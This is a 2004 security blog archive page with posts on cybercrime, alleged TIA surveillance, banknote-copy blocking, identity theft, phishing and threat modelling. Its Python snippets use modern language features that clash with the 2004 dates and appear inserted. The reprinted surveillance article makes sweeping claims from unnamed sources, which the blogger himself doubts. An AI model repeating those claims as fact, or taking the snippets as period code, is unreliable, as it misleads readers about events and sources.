    In some cases, investigators have to be a little bit sneaky themselves.
    Once, an ICG staffer befriended a suspect in a "pump-and-dump" scheme - in
    which swindlers heavily promote a little-known stock to get the price up,
    then sell their holdings at artificially high prices - by chatting with him
    electronically on a chess Web site.

    The Internet boom almost guarantees an unending supply of cybercriminals.
    "They're like mushrooms," Allison said.

    Right now, the most crowded fields of criminal activity are the digital
    theft of music and movies, illegal prescription-drug sales and "phishers,"
    identity thieves who pose as representatives of financial institutions and
    send out fake e-mails to people asking for their account information. The
    Anti-Phishing Working Group, an industry association, estimates that 5
    percent to 20 percent of recipients respond to these phony e-mails.

    In 2003, 215,000 cases of identity theft were reported to the Federal Trade
    Commission, an increase of 33 percent from the year before.

    This bad news for consumers is a growth opportunity for ICG. "The bad guys
    will always be out there," Allison said. "But we're getting better and
    better. And we're catching up quickly."

    The New York Times

    Posted by iang at 07:24 PM | Comments (3) | TrackBack

    June 10, 2004

    Big and Brotherly

    The White House administration has apparently defied the US Congress and kept the controversial "Total Information Awareness" going as a secret project. A politics journal called Capitol Hill Blue has exposed what it claims is the TIA project operating with no change.

    Whether this is all true, or just another anti-Bush story by Democrat apologists in the leadup to the election, is open to question. Republican apologists can now chime in on cue. While they are doing that, the article below makes some impressive claims about the monitoring of US citizens' habits.

    If you're looking for the fire, that's an awful lot of smoke. What does all this mean? Well, for one, it should put pressure on the open source crypto community to loosen up. Pretty much all of that surveillance can be addressed using free and easy techniques that have otherwise been eschewed for lack of serious threat models. I speak, of course, of using opportunistic cryptography to get protection deployed as widely as possible.

    This could take us back to the halcyon days of the 90s, when the open source community fought with the dark side to deploy crypto to all. A much more noble battle than today's windmill tilting against credit card thieves and other corporately inspired woftams. We didn't, it seems, succeed in protecting many people, as crypto remains widely undeployed, and where it is deployed, it is of uncertain utility. But we're older and wiser now. Maybe it's time for another go.
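    To make the point concrete: opportunistic cryptography is the STARTTLS pattern - encrypt whenever the other side can, rather than failing closed and encrypting nobody. A minimal sketch in Python (the hostname is a placeholder; note this defends against passive eavesdropping only, not an active MITM):

        # Opportunistic encryption, STARTTLS-style: a minimal sketch.
        # Upgrade to TLS when the server offers it; otherwise fall back
        # to plaintext rather than refusing to talk at all.
        import smtplib

        def open_opportunistic(host: str, port: int = 25) -> smtplib.SMTP:
            conn = smtplib.SMTP(host, port)
            conn.ehlo()
            if conn.has_extn("starttls"):
                conn.starttls()   # no certificate checking here: stops
                conn.ehlo()       # passive eavesdropping, not active MITM
            return conn

        conn = open_opportunistic("mail.example.com")

    The design choice is the whole argument: no keys to manage, no user decisions, no failure mode that tempts anyone to turn it off - exactly the kind of free and easy technique meant above.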



    From Capitol Hill Blue

    What Price Freedom?
    How Big Brother Is Watching, Listening and Misusing Information About You
    By TERESA HAMPTON & DOUG THOMPSON
    Jun 8, 2004, 08:19

    You're on your way to work in the morning and place a call on your wireless phone. As your call is relayed by the wireless tower, it is also relayed by another series of towers to a microwave antenna on top of Mount Weather between Leesburg and Winchester, Virginia and then beamed to another antenna on top of an office building in Arlington where it is recorded on a computer hard drive.

    The computer also records your phone's digital serial number, which is used to identify you through your wireless company phone bill that the Defense Advanced Research Projects Agency already has on record as part of your permanent file.

    A series of sophisticated computer programs listens to your phone conversation and looks for "keywords" that suggest suspicious activity. If it picks up those words, an investigative file is opened and sent to the Department of Homeland Security.

    Congratulations. Big Brother has just identified you as a potential threat to the security of the United States because you might have used words like "take out" (as in taking someone out when you were in fact talking about ordering takeout for lunch) or "D-Day" (as in deadline for some nefarious activity when you were talking about going to the new World War II Memorial to recognize the 60th anniversary of D-Day).

    If you are lucky, an investigator at DHS will look at the entire conversation in context and delete the file. Or he or she may keep the file open even if they realize the use of words was innocent. Or they may decide you are, indeed, a threat and set up more investigation, including a wiretap on your home and office phones, around-the-clock surveillance and much closer looks at your life.

    Welcome to America, 2004, where the actions of more than 150 million citizens are monitored 24/7 by the TIA, the Terrorist Information Awareness (originally called Total Information Awareness) program of DARPA, DHS and the Department of Justice.

    Although Congress cut off funding for TIA last year, the Bush Administration ordered the program moved into the Pentagon's "black bag" budget, which is neither authorized nor reviewed by the Hill. DARPA also increased the use of private contractors to get around privacy laws that would restrict activities by federal employees.

    Six months of interviews with security consultants, former DARPA employees, privacy experts and contractors who worked on the TIA facility at 3701 Fairfax Drive in Arlington reveal a massive snooping operation that is capable of gathering - in real time - vast amounts of information on the day to day activities of ordinary Americans.

    Going on a trip? TIA knows where you are going because your train, plane or hotel reservations are forwarded automatically to the DARPA computers. Driving? Every time you use a credit card to purchase gas, a record of that transaction is sent to TIA which can track your movements across town or across the country.

    Use a computerized transmitter to pay tolls? TIA is notified every time that transmitter passes through a toll booth. Likewise, that lunch you paid for with your VISA becomes part of your permanent file, along with your credit report, medical records, driving record and even your TV viewing habits.

    Subscribers to the DirecTV satellite TV service should know - but probably don't - that every pay-per-view movie they order is reported to TIA as is any program they record using a TIVO recording system. If they order an adult film from any of DirecTV's three SpiceTV channels, that information goes to TIA and is, as a matter of policy, forwarded to the Department of Justice's special task force on pornography.

    "We have a police state far beyond anything George Orwell imagined in his book 1984," says privacy expert Susan Morrissey. "The everyday lives of virtually every American are under scrutiny 24-hours-a-day by the government."

    Paul Hawken, owner of the data information mining company Groxis, agrees, saying the government is spending more time watching ordinary Americans than chasing terrorists and the bad news is that they aren't very good at it.

    "It's the Three Stooges go to data mining school," says Hawken. "Even worse, DARPA is depending on second-rate companies to provide them with the technology, which only increases the chances for errors."

    One such company is Torch Concepts. DARPA provided the company with flight information on five million passengers who flew Jet Blue Airlines in 2002 and 2003. Torch then matched that information with social security numbers, credit and other personal information in the TIA databases to build a prototype passenger profiling system.

    Jet Blue executives were livid when they learned how their passenger information, which they must provide the government under the USA Patriot Act, was used and when it was presented at a technology conference with the title: Homeland Security - Airline Passenger Risk Assessment.

    Privacy Expert Bill Scannell didn't buy Jet Blue's anger.

    "JetBlue has assaulted the privacy of 5 million of its customers," said Scannell. "Anyone who flew should be aware and very scared that there is a dossier on them."

    But information from TIA will be used by the DHS as a major part of the proposed CAPPS II airline passenger monitoring system. That system, when fully in place, will determine whether or not any American is allowed to get on an airplane.

    JetBlue requested the report be destroyed and the passenger data be purged from the TIA computers but TIA refuses to disclose the status of either the report or the data.

    Although exact statistics are classified, security experts say the U.S. Government has paid out millions of dollars in out-of-court settlements to Americans who have been wrongly accused, illegally detained or harassed because of mistakes made by TIA. Those who accept settlements also have to sign a non-disclosure agreement and won't discuss their cases.

    Hawken refused to do business with DARPA, saying TIA was both unethical and illegal.

    "We got a lot of e-mails from companies - even conservative ones - saying, 'Thank you. Finally someone won't do something for money,'" he adds.

    Those who refuse to work with TIA include specialists from the super-secret National Security Agency in Fort Meade, MD. TIA uses NSA's technology to listen in on wireless phone calls as well as the agency's list of key words and phrases to identify potential terrorist activity.

    "I know NSA employees who have quit rather than cooperate with DARPA," Hawken says. "NSA's mandate is to track the activities of foreign enemies of this nation, not Americans."

    © Copyright 2004 Capitol Hill Blue

    Posted by iang at 04:57 PM | Comments (7) | TrackBack

    June 07, 2004

    New public DRM technique from the Central Banks

    Over in the UK, Bob Hettinga reports on an article in the Observer about how the EU legislators are preparing to mandate software and hardware to reject images of banknotes. Ya gotta hand it to the Europeans, they love fixing things with directives. Here's the technique:

    "The software relies on features built into leading currencies. Latest banknotes contain a pattern of five tiny circles. On the £20 note, they're disguised as a musical notation, on the euro they appear in a constellation of stars; on the new $20 note, the pattern is hidden in the zeros of a background pattern. Imaging software or devices detect the pattern and refuse to deal with the image."

    I think this is a great idea. I think we should all adopt this DRM technique for our imagery, and use the 5 circle pattern to stop people copying our logos, our holiday snaps, and our bedroom pictures posted on girlfriend swap sites.

    The best part is that, as the pattern is part of the asset base of the governments, we the people already own it.
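    The real detection algorithm is of course secret, but the public description - a fixed constellation of five tiny circles - suggests nothing more exotic than circle detection plus a geometry check. A toy sketch of how an imaging tool might refuse an image (not the actual algorithm; the OpenCV parameters here are guesses):

        # Toy sketch of constellation-style image blocking - NOT the real
        # central bank algorithm; detection parameters are invented.
        import cv2

        def looks_like_banknote(path: str) -> bool:
            gray = cv2.imread(path, cv2.IMREAD_GRAYSCALE)
            circles = cv2.HoughCircles(
                gray, cv2.HOUGH_GRADIENT, dp=1, minDist=5,
                param1=100, param2=30, minRadius=2, maxRadius=8)
            # The real system presumably also checks the circles' relative
            # positions; counting small circles is a crude stand-in.
            return circles is not None and len(circles[0]) >= 5

        if looks_like_banknote("scan.png"):
            raise SystemExit("Refusing to process an image of a banknote.")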



    Security clampdown on the home PC banknote forgers

    Banks win EU support for software blocks to tackle the cottage counterfeiters
    Tony Thompson, crime correspondent - Observer
    Sunday June 6, 2004

    Computer and software manufacturers are to be forced to introduce new security measures to make it impossible for their products to be used to copy banknotes.

    The move, to be drafted into European Union legislation by the year end, follows a surge in counterfeit currency produced using laser printers, home scanners and graphics software. Imaging software and printers have become so powerful and affordable that production of fake banknotes has become a booming cottage industry.

    Though counterfeiters are usually unable to source the specialist paper on which genuine banknotes are printed, many are being mixed in with genuine notes in high volume batches. The copies are often good enough to fool vending machines. By using a fake £20 note to purchase a £2 rail fare, the criminal can take away £18 in genuine change.

    Although the Bank of England refuses to issue figures for the number of counterfeit notes in circulation and insists they represent a negligible fraction of notes issued, it also admits fakes are on the increase.

    Anti-counterfeiting software developed by the Central Bank Counterfeit Deterrence Group, an organisation of 27 leading world banks including the Bank of England, has been distributed free of charge to computer and software manufacturers since the beginning of the year. At present use of the software is voluntary though several companies have incorporated it into their products.

    The latest version of Adobe Photoshop, a popular graphics package, generates an error message if the user attempts to scan banknotes of main currencies. A number of printer manufacturers have also incorporated the software so that only an inch or so of a banknote will reproduce, to be followed by the web address of a site displaying regulations governing the reproduction of money.

    The software relies on features built into leading currencies. Latest banknotes contain a pattern of five tiny circles. On the £20 note, they're disguised as a musical notation, on the euro they appear in a constellation of stars; on the new $20 note, the pattern is hidden in the zeros of a background pattern. Imaging software or devices detect the pattern and refuse to deal with the image.

    Certain colour copiers now come loaded with software that detects when a banknote has been placed on the glass, and refuses to make a copy or produces a blank sheet.

    Researchers at Hewlett Packard are to introduce technology that would allow printers to detect colours similar to those used in currency. The printer will automatically alter the colour so that the difference between the final product and a genuine banknote will be easily detectable by the naked eye.

    Adobe acted after it emerged that several counterfeiting gangs had used Photoshop to manipulate and enhance images. The security feature, which is not mentioned in any product documentation, has outraged users who say it could interfere with genuine artistic projects. There were also concerns that the software would automatically report duplication attempts to the software company or police via the internet.

    A spokesman for the National Criminal Intelligence Service said criminals traditionally used offset lithographic printing for counterfeiting. 'Developments in electrostatic photocopying equipment, together with advances in computer and reprographic technology, have led to a rise in the proportion of counterfeit notes produced in a domestic environment. The use of this technology generally results in a lower quality counterfeit, although this varies according to the skill of the counterfeiter and the equipment and techniques used.'

    Although some countries, most notably America, allow reproduction of banknotes for artistic purposes if they are either significantly larger or smaller than the real thing, in the UK it is a criminal offence to reproduce 'on any substance whatsoever, and whether or not on the correct scale', any part of any Bank of England banknote.

    Guardian Unlimited © Guardian Newspapers Limited 2004

    Posted by iang at 04:44 AM | Comments (8) | TrackBack

    May 25, 2004

    Identity Theft - the American Disease

    Identity theft is a uniquely American problem. It reflects the massive - in comparison to other countries - use of data and credit to manage Americans' lives. Other countries would do well to follow the experiences, as "what happens there, comes here." Here are two articles on the modus operandi of the identity thief [1], and the positive side of massive data collection [2].

    First up, the identity thief [1]. He's not an individual, he's a gang, or more like a farm. Your identity is simply a crop to process. Surprisingly, it appears that garbage collected from the streets (Americans call it trash) is still the seed material. Further, the database nation's targeting characteristics work for the thief, as he doesn't need to "qualify" the victim any. If you receive lots of wonderful finance deals, he wants your business too.

    Once sufficient information is collected (bounties paid per paper), it becomes a process of using PCs and innocent address authorities to weasel one's way into the prime spot. For example, your mail is redirected to the farm, the right mails are extracted, and your proper mail is conveniently re-delivered - the classic MITM. We all know paper identity is worthless for real security, but it is still surprising to see how easily we can be harvested.

    [Addendum: Lynn Wheeler reports that a new study by Professor Judith Collins of Michigan State University reveals up to 70% of identity theft starts with employee insider theft [1.b]. This study, as reported by MSNBC, directly challenges the above article.]


    Next up, a surprisingly thoughtful article on how data collection delivers real value - cost savings - to American society [2]. The surprise is in the author, Declan McCullagh, who had previously been thought to be a bit of a Barbie for his salacious use of gossip in the paparazzi tech press. The content is good but very long.

    The real use of information is to make informed choices - not offer the wrong thing. Historically, this evolved as networks of traders that shared information. To counteract fraud that arose, traders kept blacklists and excluded no-gooders. A dealer exposed as misusing his position of power stood to lose a lot, as Adam Smith argued, far more indeed than the gain on any one transaction [3].

    In the large, merchants with businesses exposed to public scrutiny, or to American-style suits, can be trusted to deal fairly. Indeed, McCullagh claims, the US websites are delivering approximately the same results in privacy protection as those in Europe. Free market wins again over centralised regulations.

    Yet there is one area where things are going to pot. The company known as the US government, a sprawling, complex interlinking of huge numbers of databases, is above any consumer scrutiny and thus above any pressure for fair dealings. Indeed, we've known for some years that the policing agencies did an end-run around Congress's prohibition on databases by outsourcing to the private sector. The FBI's new purchase of your data from ChoicePoint is "so secret that even the contract number may not be disclosed." This routine dishonesty and disrespect doesn't even raise an eyebrow anymore.


    Where do we go from here? As suggested, the challenge is to enjoy the benefits of massive data conglomeration without losing the benefit of privacy and freedom. It'll be tough - the technological solutions to identity frauds at all levels from financial cryptographers have not succeeded in gaining traction, probably because they are so asymmetric, and deployment is so complicated as to rule out easy wins. Even the fairly mild SSL systems the net community put in place in the '90s have been rampantly bypassed by phishing-based identity attacks, not leaving us with much hope that financial cryptographers will ever succeed in privacy protection [4].

    What is perhaps surprising is that we have in recent years redesigned our strong privacy systems to add optional identity tokens - for highly regulated markets such as securities trading [5]. The designs haven't been tested in full, but it does seem as though it is possible to build systems that are both identity-strong and privacy-strong. In fact, the result seems to be stronger than either approach alone.

    But it remains clear that deployment against an uninterested public is a hard issue. Every company selling privacy to my knowledge has failed. Don't hold your breath, or your faith, and keep an eye on how this so-far American disease spreads to other countries.

    [1] Mike Lee & Brian Hitchen, "Identity Theft - The Real Cause,"
    http://www.ebcvg.com/articles.php?id=217
    [1.b] Bob Sullivan, "Study: ID theft usually an inside job,"
    http://www.msnbc.msn.com/id/5015565
    [2] Declan McCullagh, 'The upside of "zero privacy,"'
    http://www.reason.com/0406/fe.dm.database.shtml
    [3] Adam Smith, "Lecture on the Influence of Commerce on Manners," 1766.
    [4] I write about the embarrassment known as secure browsing here:
    http://iang.org/ssl/
    [5] The methods for this are ... not publishable just yet, embarrassingly.

    Posted by iang at 08:34 AM | Comments (6) | TrackBack

    May 22, 2004

    Peter Coffee on how to lose a security debate

    Over on eWeek.com, an Internet magazine, a blog entry of mine seems to have hit home [1] and caused a response. Peter Coffee has written an article, "Report Takes Software Processes to Task" [2], that starts with "I feel as if I could get an entire year's worth of columns, or perhaps even build my next career, out of the material in a Task Force Report [3]..." Promising stuff!

    He then goes on to draw a couple of reasonable points from the report (how unprofessional security professionals are..., how security is multi-disciplinary... [4]) and then ruins his promising start by launching an ad hominem attack. Read it; it is mind-bogglingly silly.

    I won't respond, other than to point out that real security professionals do not do the ad hominem ("against the man") as it distracts from the real debate of security. As he rightly intimated, security is substantially complex. As he apparently missed, this makes security very vulnerable to the sort of $50 million pork barrel projects that look good in a report, but miss the point of the complexity. And, Mr Coffee definitely missed that doing the ad hominem thing signalled that someone was upset at their pork being spiked. Sorry about that!

    Comments of any form are welcome, although I admit to being surprised at this one. Especially, if Mr Coffee would like to take up his claim to spend a year reading and benefitting from the report, I'll respond on the security aspects he raises.

    [1] Ian Grigg, "cybersecurity FUD," 05th April, 2004,
    http://www.financialcryptography.com/mt/archives/000107.html
    [2] Peter Coffee, "Report Takes Software Processes to Task," 22nd April, 2004,
    http://www.eweek.com/article2/0,1759,1571967,00.asp
    [3] National Cyber Security Partnership, "Security Across the Software Development Life Cycle,"
    http://www.cyberpartnership.org/SDLCFULL.pdf
    [4] Ian Grigg, "Financial Cryptography in 7 Layers," 4th Financial Cryptography Conference, 2000,
    http://iang.org/papers/fc7.html

    Posted by iang at 10:11 AM | Comments (3) | TrackBack

    May 14, 2004

    Ross Anderson's "Economics and Security Resource Page"

    For those interested in the intersection of security and economics, Ross Anderson's page has a wealth of links.

    "Do we spend enough on keeping `hackers' out of our computer systems? Do we not spend enough? Or do we spend too much? For that matter, do we spend too little on the police and the army, or too much? And do we spend our security budgets on the right things?"

    "The economics of security is a hot and rapidly growing field of research. More and more people are coming to realise that security failures are often due to perverse incentives rather than to the lack of suitable technical protection mechanisms. (Indeed, the former often explain the latter.) While much recent research has been on `cyberspace' security issues - from hacking through fraud to copyright policy - it is expanding to throw light on `everyday' security issues at one end, and to provide new insights and new problems for theoretical computer scientists and `normal' economists at the other. In the commercial world, as in the world of diplomacy, there can be complex linkages between security arguments and economic ends."

    "This page provides links..."

    Posted by iang at 06:07 AM | Comments (0) | TrackBack

    May 11, 2004

    Sassy Teenager Stars in Virus Soap

    In what is rapidly becoming an Internet soap opera, an alleged writer of the Sasser virus, 18-year-old Sven Jaschan from Germany, was fingered under the bounty program initiated by Microsoft a few months back [1]. As predicted, with $250,000 in prize money, an immediate question faces Microsoft: are the informants in on the game [2]?

    Microsoft insists that "the informant had no connection to the virus writer's work, and say they wouldn't pay a reward to anyone who had helped author the computer virus." Others are skeptical, both of the incident and the benefit of the program [3].

    Says one person: "In the last 15 years we've had 30 or 40 arrests of these people worldwide, and yet we still get 15 more of these (viruses) every week." The power of perception remains foremost here as all reporters routinely ignore the underlying structural weaknesses in the Microsoft platform that is being hit by virus after virus. Perhaps that story is stale.

    The German authorities released the author immediately, when they discovered that his intentions may have been honourable [4]. He was just helping his Mom, the papers say, and he deserves a medal, not prison:

    'Despite the damage to millions of computers, one leading German newspaper said in a page one commentary Monday there was a strange sense of national pride that a German student had outwitted the world's best computer experts. "Many of the (German) journalists who traveled to the province could not help but harbor clandestine admiration for the effectiveness of the worm," Die Welt daily wrote.'

    American virus company NAI immediately responded with a call for new laws:

    'Jimmy Kuo, a research fellow with antivirus software maker NAI .... said that additional laws may be necessary to dissuade virus writers from releasing their programs onto the Internet. "We would hope that there could be laws that would prohibit the posting of malicious code," Kuo said. "Sasser was partially written by some malicious code that was downloaded by the Internet." [5]'

    They had their chance in 1945. But, there is good news - at least Microsoft announced a few years ago that security is its goal. I see no evidence in the browser market that they are serious, but I suppose we'll know more in 15 more years [6].


    Addendum: It seems that a week later ("Police probe Sasser informant") the informant was already on the way to losing his bounty. Question is, what happens now? What's the point in informing on a virus writer if your life gets turned upside down on the suspicion that you are in cahoots? Safer to go find some other line of work...



    [1] "'Sasser e' rears its head", 11 May 2004.
    [2] "The Good, The Bad, and the Ugly", 09 November 2003.
    [3] "Experts pessimistic on deterrent effect", 10 May 2004.
    [4] "German Net Worm Writer May Have Been Helping Mom", 10 May 2004.
    [5] "Fifth Sasser 'released before arrest'", 11 May 2004.
    [6] "Cost of Phishing - Case in Texas", 05 May 2004.

    Posted by iang at 07:07 AM | Comments (0) | TrackBack

    April 21, 2004

    Tumbleweed casts CA-signed cert lure

    The Feb issue of Nilson Report reports stats from the antiphishing.org WG. New, for me at least, is some light thrown on Tumbleweed, the company behind the WG, which as suspected is casting itself as a solution to phishing.

    "Email Signatures [quoteth Nilson]. Tumbleweed is developing a method of using digital signature issued by a trusted Certificate Authority (CA) to sign emails. This type of technology, also being pursued by AOL, Microsoft, and Yahoo, would help thwart phishing scams. While crooks who own legitimate sounding domain names (such as Visa.customerservice.com) could still sign their messages, an alert would arrive with the email if the signature had not been issued by a CA. The larger problem with signing emails could come down the line as phishers migrate to other methods of luring victims. Some have already started using instant messaging. Next could be mobile messaging, banner ads, and sites that would turn up readily in a Google search. Beefing up law enforcement is another option, but with more and more phishers operating globally, it can take up to a week to ferret them out and shut them down."

    Well, Nilson picked up the obvious, so no need to dwell on it here. It then goes on to talk about PassMark, which I slammed in "Phishing - and now the 'solutions providers'".

    What are we supposed to conclude from this parade of aspiring security beauties? One solution provider hasn't thought it through at all, and the other seems to be "just using CA-signed certs," the very technology that is being perverted in the first place. As if it hadn't thought it through at all...
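    For the record, the mechanical core of "just using CA-signed certs" is nothing more than issuer verification on the signer's certificate. A bare-bones sketch with the Python cryptography package, assuming an RSA-signed certificate (real S/MIME validation also needs chain building, expiry, revocation and name checks, all omitted here):

        # Bare-bones issuer check - assumes an RSA-signed certificate and
        # omits chain building, expiry, revocation and name checks.
        from cryptography import x509
        from cryptography.hazmat.primitives.asymmetric import padding

        def issued_by(cert_pem: bytes, ca_pem: bytes) -> bool:
            cert = x509.load_pem_x509_certificate(cert_pem)
            ca = x509.load_pem_x509_certificate(ca_pem)
            try:
                ca.public_key().verify(
                    cert.signature,
                    cert.tbs_certificate_bytes,
                    padding.PKCS1v15(),
                    cert.signature_hash_algorithm,
                )
                return True
            except Exception:
                return False

    And that is the point: the check says who issued the certificate, not whether Visa.customerservice.com is Visa.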

    Is there no security company out there that does security? It is rather boring repeating the solution so I won't, today.

    Posted by iang at 10:13 AM | Comments (1) | TrackBack

    April 19, 2004

    Comdot from Beepcard

    Beepcard has developed Comdot™, a self-powered electronic card that performs wireless authentication without using a card reader. The card transmits a user identification code to a PC, cell phone, or regular phone, enabling online authentication and physical presence in online transactions.

    Comdot supports payment card legacy systems, such as magnetic stripe readers, smart chips and embossing. It can be implemented as a standard credit card, a membership card, or a gift certificate, and works both on the Internet and in the offline world.

    The Comdot system will come as welcome relief to any system provider struggling to increase security rapidly on a mass scale, and to do so unobtrusively. Comdot™ is the ideal solution to the "reader" problem that has plagued mass deployment of smart cards. Indeed, these sound-based communications cards reach most transaction arenas that until now have been relegated to a status that the financial services world has always regarded as "card-not-present." Also for healthcare organizations, transportation and communications networks and corporate computing systems, Comdot™ cards offer an important leap forward as an authentication scheme that is both secure and convenient.

    The "Reader-Free" Revolution

    How do we do it? By using "clientless" architecture and by creating an active, rather than passive, card device:

    Clientless architecture. Any standard home computer can talk to Comdot cards, as soon as the card software is installed. The sub-100k card communications software applet can be embedded in any service provider web page or e-wallet system or can reside within any other software that is permanently resident on a user's computer. Either way, installation is simple and neat. The web-based version installs automatically on the user's computer. The resident version comes with a wizard that installs onto the user's computer in seconds.

    Comdot™ Applications
    Comdot turns every PC or phone into a secure point of sale, enabling secure Internet shopping, banking, and financial account services. Comdot and accompanying software provide online value in several core operations, such as:

    Launch. One-click launch of web browser and direction to the card issuer's online services. One-click launch of e-wallets, online account services, or other value-added Internet services.

    Authenticate. Online authentication of users. The proliferation of Internet banking, stock portfolios, and application service providers of all sorts increases the need for online user authentication. Comdot is a low-cost, physical, first-factor user authentication device that replaces vulnerable and easy-to-forget passwords.

    Transact. Unprecedented physical presence in online transactions. The Beepcard card authenticates cardholders to their payment card issuers and e-merchants, greatly reducing the problem of on-line fraud. Because the presence of a Comdot card in transactions can be proven, cardholders shop online without fear of credit card theft. The result: increased consumer trust in e-commerce. The presence of Comdot technology in an online transaction reduces the likelihood of purchase dispute and repudiation.
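    Beepcard's actual protocol is proprietary, so as an illustration only: "physical presence" schemes of this sort generally reduce to the card emitting a one-time code derived from a per-card secret, which the issuer re-derives and compares. A generic sketch of counter-based code verification (an assumption, not Beepcard's design):

        # Generic counter-based one-time code check - an illustration of
        # the idea, NOT Beepcard's proprietary protocol.
        import hashlib
        import hmac

        def one_time_code(secret: bytes, counter: int) -> str:
            mac = hmac.new(secret, counter.to_bytes(8, "big"), hashlib.sha1)
            return mac.hexdigest()[:8]

        def verify(secret: bytes, last_counter: int, code: str, window: int = 10):
            # Accept a small window of counters, to tolerate card presses
            # the server never heard; return the new counter on success.
            for c in range(last_counter + 1, last_counter + 1 + window):
                if hmac.compare_digest(one_time_code(secret, c), code):
                    return c
            return None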

    Posted by graeme at 02:30 PM | Comments (0) | TrackBack

    April 06, 2004

    Security Modelling

    One bright spot in the aforementioned report on cyber security is the section on security modelling [1] [2]. I had looked at this a few weeks back and found... very little in the way of methodology and guidance on how to do this as a process [3]. The sections extracted below confirm that there isn't much out there, as well as listing what steps are known, and providing some references. FTR.

    [1] Cybersecurity FUD, FC Blog entry, 5th April 2004, http://www.financialcryptography.com/mt/archives/000107.html
    [2] Security Across the Software Development Lifecycle Task Force, _Improving Security Across the Software Development LifeCycle_, 1st April, 2004. Appendix B: Processes to Produce Secure Software, "Practices for Producing Secure Software," pp. 21-25. http://www.cyberpartnership.org/SDLCFULL.pdf
    [3] Browser Threat Model, FC Blog entry, 26th February 2004. http://www.financialcryptography.com/mt/archives/000078.html



    Principles of Secure Software Development

    While principles alone are not sufficient for secure software development, principles can help guide secure software development practices. Some of the earliest secure software development principles were proposed by Saltzer and Schroeder in 1974 [Saltzer]. These eight principles apply today as well and are repeated verbatim here:

    1. Economy of mechanism: Keep the design as simple and small as possible.
    2. Fail-safe defaults: Base access decisions on permission rather than exclusion.
    3. Complete mediation: Every access to every object must be checked for authority.
    4. Open design: The design should not be secret.
    5. Separation of privilege: Where feasible, a protection mechanism that requires two keys to unlock it is more robust and flexible than one that allows access to the presenter of only a single key.
    6. Least privilege: Every program and every user of the system should operate using the least set of privileges necessary to complete the job.
    7. Least common mechanism: Minimize the amount of mechanism common to more than one user and depended on by all users.
    8. Psychological acceptability: It is essential that the human interface be designed for ease of use, so that users routinely and automatically apply the protection mechanisms correctly.

    Later work by Peter Neumann [Neumann], John Viega and Gary McGraw [Viega], and the Open Web Application Security Project (http://www.owasp.org) builds on these basic security principles, but the essence remains the same and has stood the test of time.
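    Principle 2, fail-safe defaults, is the one most directly expressible in code: make "deny" the path taken whenever anything is missing or unknown. A minimal sketch (the users, objects and permission table are illustrative only):

        # Fail-safe defaults: access is denied unless explicitly granted.
        # The permission table and names are illustrative only.
        PERMISSIONS = {("alice", "report.pdf"): {"read"}}

        def allowed(user: str, obj: str, action: str) -> bool:
            # Base the decision on permission rather than exclusion: an
            # unknown user, object or action all fall through to "deny".
            return action in PERMISSIONS.get((user, obj), set())

        assert allowed("alice", "report.pdf", "read")
        assert not allowed("alice", "report.pdf", "write")   # not granted
        assert not allowed("mallory", "report.pdf", "read")  # unknown user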

    Threat Modeling

    Threat modeling is a security analysis methodology that can be used to identify risks, and guide subsequent design, coding, and testing decisions. The methodology is mainly used in the earliest phases of a project, using specifications, architectural views, data flow diagrams, activity diagrams, etc. But it can also be used with detailed design documents and code. Threat modeling addresses those threats with the potential of causing the maximum damage to an application.

    Overall, threat modeling involves identifying the key assets of an application, decomposing the application, identifying and categorizing the threats to each asset or component, rating the threats based on a risk ranking, and then developing threat mitigation strategies that are then implemented in designs, code, and test cases. Microsoft has defined a structured method for threat modeling, consisting of the following steps [Howard 2002].

  • Identify assets
  • Create an architecture overview
  • Decompose the application
  • Identify the threats
  • Categorize the threats using the STRIDE model (Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, and Elevation of privilege)
  • Rank the threats using the DREAD categories (Damage potential, Reproducibility, Exploitability, Affected users, and Discoverability)
  • Develop threat mitigation strategies for the highest ranking threats

    Other structured methods for threat modeling are available as well [Schneier].

    Although some anecdotal evidence exists for the effectiveness of threat modeling in reducing security vulnerabilities, no empirical evidence is readily available.
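    The ranking step is simple arithmetic: score each threat against the five DREAD categories and sort. A minimal sketch (the threats and scores are invented for illustration):

        # DREAD ranking: mean of Damage, Reproducibility, Exploitability,
        # Affected users, Discoverability, each scored here on 1-10.
        # The threats and scores are invented for illustration.
        threats = {
            "SQL injection in login form":    (9, 9, 7, 10, 8),
            "Session token exposed in URL":   (6, 10, 8, 6, 9),
            "Error pages leak install paths": (2, 10, 5, 3, 10),
        }

        def dread(scores: tuple) -> float:
            return sum(scores) / len(scores)

        for name, scores in sorted(threats.items(), key=lambda t: -dread(t[1])):
            print(f"{dread(scores):4.1f}  {name}")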

    Attack Trees

    Attack trees characterize system security when faced with varying attacks. The use of attack trees for characterizing system security is based partially on Nancy Leveson's work with "fault trees" in software safety [Leveson]. Attack trees model the decision-making process of attackers. Attacks against a system are represented in a tree structure. The root of the tree represents the potential goal of an attacker (for example, to steal a credit card number). The nodes in the tree represent actions the attacker takes, and each path in the tree represents a unique attack to achieve the goal of the attacker.

    Attack trees can be used to answer questions such as: What is the easiest attack? The cheapest attack? The attack that causes the most damage? The hardest attack to detect? Attack trees are used for risk analysis, to answer questions about the system's security, to capture security knowledge in a reusable way, and to design, implement, and test countermeasures to attacks [Viega] [Schneier] [Moore].

    Just as with Threat Modeling, there is anecdotal evidence of the benefits of using Attack Trees, but no empirical evidence is readily available.
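    The mechanics fit in a few lines: leaves carry attacker costs, an OR node takes its cheapest child, an AND node sums its children, and the root's value answers "what is the cheapest attack?" A minimal sketch (the tree and costs are invented):

        # Minimal attack tree: OR = attacker picks the cheapest branch,
        # AND = attacker must complete every step. Costs are invented.
        def cost(node):
            kind, rest = node[0], node[1:]
            if kind == "leaf":
                return rest[0]
            child_costs = [cost(child) for child in rest]
            return min(child_costs) if kind == "or" else sum(child_costs)

        steal_card_number = (
            "or",
            ("leaf", 100_000),                     # break the crypto
            ("and", ("leaf", 50), ("leaf", 20)),   # phish user, then cash out
            ("leaf", 500),                         # bribe an insider
        )
        print(cost(steal_card_number))   # -> 70: phishing is the cheapest attack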

    Attack Patterns

    Hoglund and McGraw have identified forty-nine attack patterns that can guide design, implementation, and testing [Hoglund]. These soon-to-be-published patterns include:

    1. Make the Client Invisible
    2. Target Programs That Write to Privileged OS Resources
    3. Use a User-Supplied Configuration File to Run Commands That Elevate Privilege
    4. Make Use of Configuration File Search Paths
    5. Direct Access to Executable Files
    6. Embedding Scripts within Scripts
    7. Leverage Executable Code in Nonexecutable Files
    8. Argument Injection
    9. Command Delimiters
    10. Multiple Parsers and Double Escapes
    11. User-Supplied Variable Passed to File System Calls
    12. Postfix NULL Terminator
    13. Postfix, Null Terminate, and Backslash
